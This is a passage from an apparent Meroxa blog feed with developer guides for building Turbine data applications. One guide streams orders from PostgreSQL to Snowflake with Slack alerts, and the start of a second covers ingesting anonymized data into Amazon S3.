&lt;li&gt;Send an alert to Slack when an order is created.&lt;/li&gt;
&lt;/ul&gt;
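&lt;p&gt;The entry point shown later imports a &lt;code class=&quot;language-text&quot;&gt;sendSlackMessage&lt;/code&gt; helper from &lt;code class=&quot;language-text&quot;&gt;alert.js&lt;/code&gt;. As a rough sketch (not the example repo's actual implementation — the webhook URL variable, message wording, and helper names here are assumptions), such an alert could look like this:&lt;/p&gt;

```javascript
// Hypothetical sketch of an alert module. The SLACK_WEBHOOK_URL env var,
// message format, and buildOrderMessage helper are illustrative assumptions,
// not the example repo's real code.

// Build a Slack message payload from a CDC record (pure, easy to test).
function buildOrderMessage(record) {
  const { after, op } = record.value.payload;
  if (op !== 'c') return null; // only alert on newly created orders
  return { text: `New order received: #${after.id}` };
}

// Post the message to a Slack incoming webhook (Node 18+ global fetch).
async function sendSlackMessage(record) {
  const message = buildOrderMessage(record);
  if (!message) return;
  await fetch(process.env.SLACK_WEBHOOK_URL, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(message),
  });
}

module.exports = { buildOrderMessage, sendSlackMessage };
```

Splitting the pure message-building step from the network call keeps the alert logic testable without a live webhook.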
&lt;h3&gt;Setup&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine#setup&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Before we begin, you need to set up a few things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/turbine/get-started&quot;&gt;Sign up for a Meroxa account and install the latest Meroxa CLI.&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;Log in with the Meroxa CLI:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa login&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;3&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-js-examples&quot;&gt;Clone the example to your local machine&lt;/a&gt;:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; clone git@github.com:meroxa/turbine-js-examples.git&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Since this example uses JavaScript, you will need to have &lt;a href=&quot;https://nodejs.org/&quot;&gt;Node.js&lt;/a&gt; installed.&lt;/p&gt;
&lt;ol start=&quot;4&quot;&gt;
&lt;li&gt;Copy the &lt;code class=&quot;language-text&quot;&gt;ecommerce-order-alerting&lt;/code&gt; directory from the cloned repository:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;cp&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-r&lt;/span&gt; ~/turbine-js-examples/ecommerce-order-alerting ~/&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;5&quot;&gt;
&lt;li&gt;Install NPM dependencies:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;cd&lt;/span&gt; ecommerce-order-alerting&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;npm&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now we are ready to build.&lt;/p&gt;
&lt;h3&gt;Data Application Entrypoint&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine#data-application-entrypoint&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; sendSlackMessage &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;./alert.js&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token function&quot;&gt;sendAlert&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; payload &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;value&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;payload
            &lt;span class=&quot;token function&quot;&gt;sendSlackMessage&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;payload&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;pg&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;customerOrders&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; data &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;sendAlert&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;snowflake&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;customerOrders&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Running&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine#running&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Next, you may run your data application locally:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app run&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Turbine uses &lt;a href=&quot;https://docs.meroxa.com/getting-started/quickstart#run-a-streaming-app-locally&quot;&gt;fixtures to simulate your data infrastructure&lt;/a&gt; locally. This lets you test without worrying about the infrastructure itself. Fixtures are JSON-formatted data records you can develop against locally; to customize them for your application, edit the files in the &lt;code class=&quot;language-text&quot;&gt;fixtures&lt;/code&gt; directory.&lt;/p&gt;
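&lt;p&gt;For illustration, a fixture record could mirror the shape that &lt;code class=&quot;language-text&quot;&gt;sendAlert&lt;/code&gt; reads above, with a &lt;code class=&quot;language-text&quot;&gt;value.payload&lt;/code&gt; field per record. The exact file layout Turbine expects is described in the linked quickstart; the field names below are assumptions:&lt;/p&gt;

```javascript
// Hypothetical fixture data for the customerOrders collection, shown
// as a JS object. Each record carries a value.payload field, matching
// how sendAlert reads record.value.payload in the entrypoint.
const fixtures = {
  customerOrders: [
    {
      key: '1',
      value: {
        payload: {
          order_id: 1,
          customer_email: 'jane@example.com',
          total: 49.99,
        },
      },
    },
  ],
};

module.exports = fixtures;
```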
&lt;h3&gt;Deployment&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine#deployment&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;After you test the behavior locally, you can deploy it to Meroxa.&lt;/p&gt;
&lt;p&gt;Meroxa is the data platform that runs your Turbine apps. It maintains the connection to your database and executes your application as changes occur. All you need to worry about is the data application itself.&lt;/p&gt;
&lt;p&gt;Here is how you deploy:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;Add a PostgreSQL resource&lt;/a&gt; to your Meroxa environment:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create postgresql &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; postgres &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; postgres://&lt;span class=&quot;token variable&quot;&gt;$PG_USER&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PASS&lt;/span&gt;@&lt;span class=&quot;token variable&quot;&gt;$PG_URL&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PORT&lt;/span&gt;/&lt;span class=&quot;token variable&quot;&gt;$PG_DB&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/snowflake&quot;&gt;Add a Snowflake data warehouse resource&lt;/a&gt; to your Meroxa environment:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create snowflake &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; snowflakedb &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;snowflake://&lt;span class=&quot;token variable&quot;&gt;$SNOWFLAKE_URL&lt;/span&gt;/meroxa_db/stream_data&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--username&lt;/span&gt; meroxa_user &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--password&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&lt;span class=&quot;token variable&quot;&gt;$SNOWFLAKE_PRIVATE_KEY&lt;/span&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;3&quot;&gt;
&lt;li&gt;Deploy to Meroxa:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app deploy&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, as changes are made to the upstream data infrastructure, your data application will be executed.&lt;/p&gt;
&lt;h3&gt;What&apos;s next?&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine#whats-next&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;That&apos;s it! Your data application is now running. You can verify the data in your data warehouse.&lt;/p&gt;
&lt;p&gt;We can&apos;t wait to see what you build 🚀.&lt;/p&gt;
&lt;p&gt;If you have any questions or feedback: &lt;a href=&quot;https://discord.com/invite/pN24QPca6b/&quot;&gt;Join the Community&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-time Data Lake Ingestion with Turbine]]></title><description><![CDATA[Turbine offers a code-first approach to building real-time data lake ingestion systems. Build, review, and test data products with a developer's mindset. ]]></description><link>https://meroxa.com/blog/real-time-data-lake-ingestion-with-turbine</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-data-lake-ingestion-with-turbine</guid><dc:creator><![CDATA[Taron Foxworth]]></dc:creator><pubDate>Wed, 20 Apr 2022 16:37:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://aws.amazon.com/big-data/datalakes-and-analytics/what-is-a-data-lake/&quot;&gt;Data lakes&lt;/a&gt; have become a popular method of storing data and performing analytics. &lt;a href=&quot;https://aws.amazon.com/s3/&quot;&gt;Amazon S3&lt;/a&gt; offers a flexible, scalable way to store data of all types and sizes, and can be accessed and analyzed by a variety of tools.&lt;/p&gt;
&lt;p&gt;Real-time data lake ingestion is the process of getting data into a data lake in near-real-time. Today, this can be accomplished with streaming data platforms, message queues, and event-driven architectures, but these systems are complex to build and operate.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://docs.meroxa.com/turbine/overview&quot;&gt;Turbine&lt;/a&gt; offers a code-first approach to building real-time data lake ingestion systems. This allows you to build, review, and test data products with a software engineering mindset. In this guide, you will learn how to use Turbine to ingest data into Amazon S3.&lt;/p&gt;
&lt;p&gt;Here is what a Turbine Application looks like:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;customer_order&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; anonymized &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;anonymize&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;s3&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;anonymized&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;customer_order&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This application uses &lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/setup&quot;&gt;JavaScript&lt;/a&gt;, but Turbine also has &lt;a href=&quot;https://docs.meroxa.com/turbine/python/setup&quot;&gt;Python&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/go/setup&quot;&gt;Go&lt;/a&gt;, and &lt;a href=&quot;https://docs.meroxa.com/turbine/ruby/setup&quot;&gt;Ruby&lt;/a&gt; libraries.&lt;/p&gt;
&lt;p&gt;Here is a quick overview of the steps we will take to get started:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;How it works&lt;/li&gt;
&lt;li&gt;Setup&lt;/li&gt;
&lt;li&gt;Application Entrypoint&lt;/li&gt;
&lt;li&gt;Running&lt;/li&gt;
&lt;li&gt;Deployment&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;How it works&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-data-lake-ingestion-with-turbine#how-it-works&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;A data application responds to events from your data infrastructure. You can learn more about the anatomy of a JavaScript data application in the &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/javascript#the-application&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://docs.meroxa.com/assets/images/real-time-data-lake-14939c0cfacbc879f91e2db134877966.png&quot; alt=&quot;Application Diagram&quot;&gt;&lt;/p&gt;
&lt;p&gt;This data application will:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Listen to &lt;a href=&quot;https://medium.com/meroxa/stream-your-database-changes-with-change-data-capture-aa8797fa9070&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;CREATE&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;UPDATE&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt;&lt;/a&gt; events from a PostgreSQL database.&lt;/li&gt;
&lt;li&gt;Anonymize the data using a custom function.&lt;/li&gt;
&lt;li&gt;Write the anonymized data to an S3 bucket.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Setup&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-data-lake-ingestion-with-turbine#setup&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Before we begin, you need to set up a few things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/turbine/get-started&quot;&gt;Sign up for a Meroxa account and install the latest Meroxa CLI.&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa login&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-js-examples&quot;&gt;Clone the example to your local machine&lt;/a&gt;:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; clone git@github.com:meroxa/turbine-js-examples.git&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Since this example uses JavaScript, you will need to have &lt;a href=&quot;https://nodejs.org/&quot;&gt;Node.js&lt;/a&gt; installed.&lt;/p&gt;
&lt;ol start=&quot;3&quot;&gt;
&lt;li&gt;Copy the &lt;code class=&quot;language-text&quot;&gt;real-time-data-lake-ingestion&lt;/code&gt; directory to your local machine:&lt;/li&gt;
&lt;/ol&gt;
